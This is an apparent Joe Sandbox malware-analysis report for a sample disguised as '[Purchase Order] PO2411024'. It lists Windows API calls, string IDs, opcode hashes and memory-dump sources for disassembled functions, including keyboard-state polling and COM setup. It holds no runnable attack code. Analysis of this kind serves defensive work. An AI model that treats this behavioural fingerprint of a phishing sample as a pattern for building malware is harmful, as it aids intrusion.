                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                    APIs
                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 3052893215-2127371420
                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-2354261254
                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 3038501623-2263619337
                                                    • Opcode ID: 6de1652b6130fa33223f4e17548c0c4421bade96c985e506a034d386b34cdb92
                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                    • Opcode Fuzzy Hash: 6de1652b6130fa33223f4e17548c0c4421bade96c985e506a034d386b34cdb92
                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                    APIs
                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2295938435-8599901
                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00443B67
                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                    • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                    • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                    • IsWindow.USER32(00000000), ref: 00443C3A
                                                    • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1834419854-3405671355
                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • _wprintf.LIBCMT ref: 00454074
                                                    • __swprintf.LIBCMT ref: 004540A3
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 455036304-4153970271
                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                    • _memmove.LIBCMT ref: 00467EB8
                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                    • _memmove.LIBCMT ref: 00467F6C
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                    • String ID:
                                                    • API String ID: 2170234536-0
                                                    • Opcode ID: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                    • Opcode Fuzzy Hash: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                    • String ID:
                                                    • API String ID: 3218148540-0
                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                    APIs
                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcstok.LIBCMT ref: 004674FF
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                    • String ID: X
                                                    • API String ID: 3104067586-3081909835
                                                    • Opcode ID: 9ee024d863acc34eb0448e75ed055d0a380087d42feff42c8c504c83a7e9e6b0
                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                    • Opcode Fuzzy Hash: 9ee024d863acc34eb0448e75ed055d0a380087d42feff42c8c504c83a7e9e6b0
                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
